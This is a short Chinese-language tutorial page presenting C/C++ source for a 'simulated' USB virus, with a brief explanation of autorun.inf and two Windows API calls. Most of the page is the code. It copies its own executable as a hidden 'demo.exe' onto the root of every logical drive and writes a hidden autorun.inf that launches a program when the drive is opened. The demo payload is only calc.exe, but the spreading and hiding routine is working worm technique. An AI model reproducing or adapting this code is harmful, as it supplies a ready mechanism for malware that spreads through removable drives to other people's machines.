最簡單的類比隨身碟病毒(Autorun.inf)

autorun.inf是我們電腦使用中比較常見的系統檔案 ，其作用是允許在雙擊磁碟時自動運行指定的某個檔案。
下面介紹幾個API函數
1.DWORD GetLogicalDriveStrings(DWORD nBufferLength, // size of bufferLPTSTR lpBuffer // drive strings buffer);
2.char *strncpy(char *dest,char *src,size_t n);第1個參數:char *strDest目的字串指標。 第2個參數:const char *strSource源字串指標。 第3個參數:size_t count 拷貝長度。 傳回值：目的字串指標。
下面是C/C++代碼

#define _CRT_SECURE_NO_WARNINGS  #include <windows.h>    char *gstrAutoRun = "[autorun]\                      \r\nopen=calc.exe   \                      \r\nshell\\open\\Command=calc.exe   \                      \r\nshell\\explore=資源管理員(&X)    \                      \r\nshell\\explore\\Command=calc.exe    \                      \r\nshellexecute=calc.exe\                      \r\nshell\\Auto\\Command=calc.exe";    void Infect(char *pstrFilePath)  {      char strDriveStrings[MAXBYTE] = { 0 };      DWORD dwDriveStrLen = GetLogicalDriveStringsA(MAXBYTE, strDriveStrings);      DWORD dwError = 0;      for (size_t i = 0; i < dwDriveStrLen; i += 4)      {          char strTargetPath[MAX_PATH] = { 0 }, strRoot[4] = { 0 };          strncpy(strRoot, &strDriveStrings[i], 4);          strcpy(strTargetPath, strRoot);          strcat(strTargetPath, "demo.exe");          if (!CopyFileA(pstrFilePath,strTargetPath,false))          {              dwError = GetLastError();          }            SetFileAttributesA(strTargetPath, FILE_ATTRIBUTE_HIDDEN);          strcpy(strTargetPath, strRoot);          strcat(strTargetPath, "autorun.inf");          HANDLE hFile = CreateFileA(strTargetPath, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,nullptr);          DWORD dwLen = 0;          WriteFile(hFile, gstrAutoRun, strlen(gstrAutoRun), &dwLen, nullptr);          CloseHandle(hFile);      }  }    int main()  {      char strSelfPath[MAX_PATH] = { 0 };      GetModuleFileNameA(nullptr, strSelfPath, MAX_PATH);      Infect(strSelfPath);      return 0;  }

以上就是 最簡單的類比隨身碟病毒(Autorun.inf)的內容，更多相關內容請關注topic.alibabacloud.com（www.php.cn）！

